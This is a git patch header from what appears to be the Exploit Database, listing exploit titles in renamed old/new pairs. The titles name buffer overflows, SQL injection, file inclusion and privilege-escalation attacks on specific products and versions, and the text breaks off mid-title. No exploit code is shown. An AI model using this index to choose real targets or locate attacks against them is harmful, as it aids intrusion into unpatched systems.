From da85686a94460196a69a26a2225748cd15cb7e53 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Oct 2016 05:01:21 +0000 Subject: [PATCH] DB: 2016-10-28 6 new exploits Real Server < 8.0.2 - Remote Exploit (Windows Platforms) RealServer < 8.0.2 - Remote Exploit (Windows Platforms) OpenSSH/PAM 3.6.1p1 - Remote Users Ident (gossh.sh) OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident CdRecord 2.0 - Mandrake Privilege Escalation CDRTools CDRecord 2.0 - Mandrake Privilege Escalation LeapFTP 2.7.x - Remote Buffer Overflow LeapWare LeapFTP 2.7.x - Remote Buffer Overflow GNU Cfengine 2.-2.0.3 - Remote Stack Overflow GNU CFEngine 2.-2.0.3 - Remote Stack Overflow IA WebMail 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit Serv-U FTPD 3.x/4.x - 'SITE CHMOD' Command Remote Exploit RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow PSOProxy 0.91 - Remote Buffer Overflow (Windows 2000/XP) IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow IPSwitch IMail LDAP Daemon/Service - Buffer Overflow RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - (MDTM) Remote Overflow Traceroute - Privilege Escalation LBL Traceroute - Privilege Escalation Perl (Redhat 6.2) - Restore and Dump Local Exploit Redhat 6.2 Restore and Dump - Local Exploit (Perl) HP-UX 11.00/10.20 - crontab Overwrite Files Exploit Solaris/SPARC 2.7 / 7 - locale Format String HP-UX 11.00/10.20 crontab - Overwrite Files Exploit Solaris/SPARC 2.7 / 7 locale - Format String Solaris - locale Format Strings (noexec stack) Exploit Solaris locale - Format Strings (noexec stack) Exploit glibc - locale bug mount Exploit GLIBC locale - bug mount Exploit Red Hat 6.2 xsoldier-0.96 - Exploit Red Hat 6.2 xsoldier 0.96 - Exploit OpenBSD 2.6 / 2.7 ftpd - Remote Exploit OpenBSD ftpd 2.6 / 2.7 - Remote Exploit GLIBC - Locale Format Strings Exploit GLIBC locale - Format Strings Exploit IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/lib/print/netprint Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - /usr/lib/print/netprint Local Exploit SquirrelMail - chpasswd Buffer Overflow SquirrelMail - 'chpasswd' Buffer Overflow rlpr 2.04 - msg() Remote Format String Rlpr 2.04 - msg() Remote Format String Solaris 2.5.0/2.5.1 ps & chkey - Data Buffer Exploit Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer Exploit IRIX - Multiple Buffer Overflows (LsD) SGI IRIX - Multiple Buffer Overflows (LsD) IRIX - /bin/login Local Buffer Overflow SGI IRIX - /bin/login Local Buffer Overflow Solaris 2.4 - passwd & yppasswd & nispasswd Overflows Solaris 2.4 passwd / yppasswd / nispasswd - Overflows BlackJumboDog - Remote Buffer Overflow BlackJumboDog FTP Server - Remote Buffer Overflow Ollydbg 1.10 - Format String OllyDbg 1.10 - Format String SquirrelMail - (chpasswd) Privilege Escalation (Brute Force Exploit) SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit) CDRecord - '$RSH' exec() SUID Shell Creation CDRecord's ReadCD - '$RSH' exec() SUID Shell Creation MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow Alt-N MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow HP-UX 11.0/11.11 swxxx - Privilege Escalation HP-UX 11.0/11.11 - swxxx Privilege Escalation Zinf 2.2.1 - Local Buffer Overflow Zinf Audio Player 2.2.1 - Local Buffer Overflow ShixxNote 6.net - Remote Buffer Overflow ShixxNOTE 6.net - Remote Buffer Overflow MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow MailCarrier 2.51 - Remote Buffer Overflow SLMail 5.5 - POP3 PASS Buffer Overflow TABS MailCarrier 2.51 - Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Buffer Overflow eZshopper - 'loadpage.cgi' Directory Traversal Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (1) Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1) Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2) Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002) Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002) Microsoft Internet Explorer - '.ANI' files handling Downloader Exploit (MS05-002) Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002) Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support) Savant Web Server 3.1 (French Windows OS support) - Remote Buffer Overflow Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow Knet 1.04c - Buffer Overflow Denial of Service KNet Web Server 1.04c - Buffer Overflow Denial of Service Einstein 1.01 - Local Password Disclosure (asm) Einstein 1.01 - Local Password Disclosure (ASM) RealPlayer 10 - '.smil' Local Buffer Overflow RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2) phpBB 2.0.12 - Session Handling Authentication Bypass UBB Threads < 6.5.2 Beta - (mailthread.php) SQL Injection UBBCentral UBB.Threads < 6.5.2 Beta - (mailthread.php) SQL Injection XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection xmlrpc.php Library 1.3.0 - Remote Command Execution (2) xmlrpc.php Library 1.3.0 - Remote Command Execution (3) XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2) XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3) wMailServer 1.0 - Remote Denial of Service SoftiaCom wMailServer 1.0 - Remote Denial of Service ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit) Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) BusinessMail 4.60.00 - Remote Buffer Overflow BusinessMail Server 4.60.00 - Remote Buffer Overflow WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit) Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit) Wireless Tools 26 - (iwconfig) Privilege Escalation (some setuid) Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid) Mercury Mail 4.01a (Pegasus) - IMAP Buffer Overflow Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow CA iGateway - (debug mode) Remote Buffer Overflow CA iTechnology iGateway - (debug mode) Remote Buffer Overflow Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC) Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit) KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit) Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp) KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp) Zorum Forum 3.5 - (rollid) SQL Injection Zorum Forum 3.5 - 'rollid' SQL Injection SaphpLesson 2.0 - (forumid) SQL Injection saPHP Lesson 2.0 - (forumid) SQL Injection zawhttpd 0.8.23 - (GET) Remote Buffer Overflow Denial of Service zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service Zix Forum 1.12 - (layid) SQL Injection Zix Forum 1.12 - 'layid' SQL Injection QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow INDEXU 5.0.1 - (admin_template_path) Remote File Inclusion Indexu 5.0.1 - (admin_template_path) Remote File Inclusion SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion SmartSite CMS 1.0 - (root) Multiple Remote File Inclusion Solaris 10 - sysinfo() Local Kernel Memory Disclosure Solaris 10 sysinfo() - Local Kernel Memory Disclosure SAPID CMS 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion ZZ:FlashChat 3.1 - (adminlog) Remote File Inclusion ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion WFTPD 3.23 - (SIZE) Remote Buffer Overflow Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow (PoC) Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC) Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion ZoomStats 1.0.2 - (mysql.php) Remote File Inclusion ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion Microsoft Internet Explorer (VML) - Remote Buffer Overflow (SP2) (Perl) Microsoft Internet Explorer - (VML) Remote Buffer Overflow (SP2) (Perl) PHPMyWebmin 1.0 - (window.php) Remote File Inclusion phpMyWebmin 1.0 - (window.php) Remote File Inclusion VideoDB 2.2.1 - (pdf.php) Remote File Inclusion VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion Microsoft Office 2003 - PPT Local Buffer Overflow (PoC) Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC) Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation Solaris 10 libnspr - Constructor Privilege Escalation Solaris 10 (libnspr) - Constructor Privilege Escalation Microsoft Windows NAT Helper Components - 'ipnathlp.dll' Remote Denial of Service Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service 3Com TFTP Service 2.0.1 - 'Long Transporting Mode' Overflow (PoC) 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC) 3Com TFTP Service 2.0.1 - 'Long Transporting Mode' Overflow Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit BlazeVideo HDTV Player 2.1 - Malformed PLF Buffer Overflow (PoC) BlazeVideo HDTV Player 2.1 - Malformed '.PLF' Buffer Overflow (PoC) AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit Irokez CMS 0.7.1 - Multiple Remote File Inclusion Irokez Blog 0.7.1 - Multiple Remote File Inclusion PHP-update 2.7 - Multiple Vulnerabilities PHP-Update 2.7 - Multiple Vulnerabilities Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC) TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow 3Com TFTP Service 2.0.1 - Remote Buffer Overflow (Metasploit) 3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit) FdScript 1.3.2 - 'download.php' Remote File Disclosure FD Script 1.3.2 - 'download.php' Remote File Disclosure Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit) Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit) SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass ZebraFeeds 1.0 - (zf_path) Remote File Inclusion ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion MailEnable Enterprise 2.32 < 2.34 - Remote Buffer Overflow MailEnable Professional 2.35 - Remote Buffer Overflow MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow Ipswitch WS_FTP 5.05 - (XMD5) Remote Buffer Overflow (Metasploit) Ipswitch WS_FTP Server 5.05 - (XMD5) Remote Buffer Overflow (Metasploit) Oracle 10g KUPW$WORKER.MAIN - SQL Injection (2) Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2) 3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl) madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow 3Com TFTP Service (3CTftpSvc) 2.0.1 - (Long Transporting Mode) Exploit (Perl) Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow TFTPDWIN Server 0.4.2 - (UDP) Denial of Service ProSysInfo TFTP Server TFTPDWIN 0.4.2 - (UDP) Denial of Service NetVios Portal - 'page.asp' SQL Injection NetVIOS Portal - 'page.asp' SQL Injection Mercury Mail 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow Apache Mod_Rewrite (Windows x86) - Off-by-One Remote Overflow Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow Microsoft Windows GDI - Privilege Escalation (MS07-017) (1) Microsoft Windows - GDI Privilege Escalation (MS07-017) (1) qdblog 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities Microsoft Windows GDI - Privilege Escalation (MS07-017) (2) Microsoft Windows - GDI Privilege Escalation (MS07-017) (2) Zomplog 3.8 - (force_download.php) Remote File Disclosure Zomplog 3.8 - 'force_download.php' Remote File Disclosure Versalsoft HTTP File Upload - ActiveX 6.36 (AddFile) Remote Denial of Service Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (PoC) UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC) Apache 2.0.58 Mod_Rewrite - Remote Overflow (Windows 2003) Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (1) UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (2) UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1) UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2) Microsoft Windows GDI+ - ICO File Remote Denial of Service Microsoft Windows - GDI+ '.ICO' File Remote Denial of Service Safari 3 for Windows Beta - Remote Command Execution (PoC) Apple Safari 3 for Windows Beta - Remote Command Execution (PoC) YourFreeScreamer 1.0 - (serverPath) Remote File Inclusion YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow PHPEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection phpEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection Oracle 9i/10g Evil Views - Change Passwords Exploit Oracle 9i/10g - Evil Views Change Passwords Exploit Savant 3.1 - GET Request Remote Overflow (Universal) Savant Web Server 3.1 - GET Request Remote Overflow (Universal) Easy Chat Server 2.2 - Remote Denial of Service EFS Easy Chat Server 2.2 - Remote Denial of Service Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite Mercury/32 Mail Server 3.32<4.51 - SMTP Unauthenticated EIP Overwrite Thomson SIP phone ST 2030 - Remote Denial of Service Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service MSN messenger 7.x (8.0?) - Video Remote Heap Overflow Microsoft MSN Messenger 7.x (8.0?) - Video Remote Heap Overflow Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow MDPro 1.0.76 - SQL Injection MD-Pro 1.0.76 - SQL Injection ZZ FlashChat 3.1 - (help.php) Local File Inclusion ZZ FlashChat 3.1 - 'help.php' Local File Inclusion PHP-AGTC membership system 1.1a - Remote Add Admin PHP-AGTC Membership System 1.1a - Remote Add Admin Quick and Dirty Blog 0.4 - (categories.php) Local File Inclusion Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion badblue 2.72b - Multiple Vulnerabilities BadBlue 2.72b - Multiple Vulnerabilities SquirrelMail G/PGP Plugin - deletekey() Command Injection SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection hp software update client 3.0.8.4 - Multiple Vulnerabilities HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow QuickTime Player 7.3.1.70 - RTSP Remote Buffer Overflow (PoC) QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC) Gradman 0.1.3 - (agregar_info.php) Local File Inclusion Gradman 0.1.3 - 'agregar_info.php' Local File Inclusion mybulletinboard (MyBB) 1.2.10 - Multiple Vulnerabilities MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities Mini File Host 1.2 - (upload.php language) Local File Inclusion Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service Mini File Host 1.2 - 'language' Parameter Local File Inclusion Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow/Denial of Service Gradman 0.1.3 - (info.php tabla) Local File Inclusion Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Gradman 0.1.3 - 'info.php' Local File Inclusion Small Axe 0.3.1 - 'cfile' Parameter Remote File Inclusion Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Mini File Host 1.2.1 - 'language' Parameter Local File Inclusion Frimousse 0.0.2 - explorerdir.php Local Directory Traversal 360 Web Manager 3.0 - (IDFM) SQL Injection bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal 360 Web Manager 3.0 - 'IDFM' Parameter SQL Injection bloofox 0.3 - SQL Injection / File Disclosure Mooseguy Blog System 1.0 - (blog.php month) SQL Injection Mooseguy Blog System 1.0 - 'month' Parameter SQL Injection IDM-OS 1.0 - (download.php Filename) File Disclosure IDM-OS 1.0 - 'Filename' Parameter File Disclosure MoinMoin 1.5.x - MOIND_ID cookie Bug Remote Exploit aflog 1.01 - comments.php Cross-Site Scripting / SQL Injection MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote Exploit aflog 1.01 - Cross-Site Scripting / SQL Injection Easysitenetwork Recipe - 'categoryId' SQL Injection Coppermine Photo Gallery 1.4.14 - SQL Injection Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection Coppermine Photo Gallery 1.4.10 - SQL Injection web wiz rich text editor 4.0 - Multiple Vulnerabilities Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure Joomla! Component Marketplace 1.1.1 - SQL Injection Joomla! Component com_Marketplace 1.1.1 - SQL Injection ASPapp - 'links.asp CatId' SQL Injection ASPapp Knowledge Base - 'links.asp CatId' SQL Injection ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root Exploit ZYXEL ZyWALL Quagga/Zebra - (Default Password) Remote Root Exploit Quick TFTP Pro 2.1 - Remote SEH Overflow Quick TFTP Server Pro 2.1 - Remote SEH Overflow Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016) Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016) HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC) Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC) Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.DSR' File Local Buffer Overflow Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow hp openview nnm 7.53 - Multiple Vulnerabilities HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities PHPKB 1.5 Knowledge Base - 'ID' SQL Injection PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection Microsoft Windows GDI - Image Parsing Stack Overflow (MS08-021) Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021) HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities ZeusCart 2.0 - (category_list.php) SQL Injection ZeusCart 2.0 - 'category_list.php' SQL Injection Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin Zomplog 3.8.2 - (force_download.php) File Disclosure Zomplog 3.8.2 - 'force_download.php' File Disclosure PHP AGTC-Membership System 1.1a - Arbitrary Add Admin PHP-AGTC Membership System 1.1a - Arbitrary Add Admin PHP Booking Calendar 10 d - SQL Injection phpBookingCalendar 10 d - SQL Injection SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC) Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC) Yuhhu 2008 SuperStar - (board) SQL Injection Yuhhu 2008 SuperStar - 'board' SQL Injection gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities gl-sh deaf forum 6.5.5 - Multiple Vulnerabilities GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow trixbox - (langChoice) Local File Inclusion (connect-back) (2) Trixbox - (langChoice) Local File Inclusion (connect-back) (2) Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Ppim 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities Cisco WebEx Meeting Manager - 'atucfobj.dll' ActiveX Remote Buffer Overflow Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow Ppim 1.0 - (upload/change Password) Multiple Vulnerabilities pPIM 1.0 - (upload/change Password) Multiple Vulnerabilities z-breaknews 2.0 - (single.php) SQL Injection z-breaknews 2.0 - 'single.php' SQL Injection Ultra Office - ActiveX Control Remote Buffer Overflow Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow (PoC) Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC) phpvid 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Zanfi CMS lite / Jaw Portal free - (page) SQL Injection phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection Microsoft Windows Media Encoder XP SP2 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021) Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021) opennms < 1.5.96 - Multiple Vulnerabilities OpenNMS < 1.5.96 - Multiple Vulnerabilities yerba sacphp 6.3 - Multiple Vulnerabilities Yerba SACphp 6.3 - Multiple Vulnerabilities Microsoft Windows GDI+ - PoC (MS08-052) (2) Microsoft Windows - GDI+ PoC (MS08-052) (2) zeeproperty - (adid) SQL Injection zeeproperty - 'adid' SQL Injection TUGzip 3.00 archiver - '.zip' Local Buffer Overflow TugZip 3.00 Archiver - '.zip' Local Buffer Overflow AJ ARTICLE - 'featured_article.php mode' SQL Injection AJ Article - 'featured_article.php mode' SQL Injection Article Publisher PRO 1.5 - Insecure Cookie Handling Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling YourFreeWorld Classifieds - (category) SQL Injection YourFreeWorld Classifieds - 'category' SQL Injection PG Roomate Finder Solution - (Authentication Bypass) SQL Injection Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC) Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC) asp AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection phpmygallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray) Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray) Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference (PoC) Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC) ProFTPd with mod_mysql - Authentication Bypass ProFTPd - 'mod_mysql' Authentication Bypass ppim 1.0 - Multiple Vulnerabilities pPIM 1.0 - Multiple Vulnerabilities Orbit 2.8.4 - Long Hostname Remote Buffer Overflow Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow Merak Media PLayer 3.2 - '.m3u' File Local Buffer Overflow (SEH) Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH) Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Files Local Heap Overflow (PoC) Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC) bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities Racer 0.5.3b5 - Remote Stack Buffer Overflow Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow Safari 3.2.2/4b - (nested elements) XML Parsing 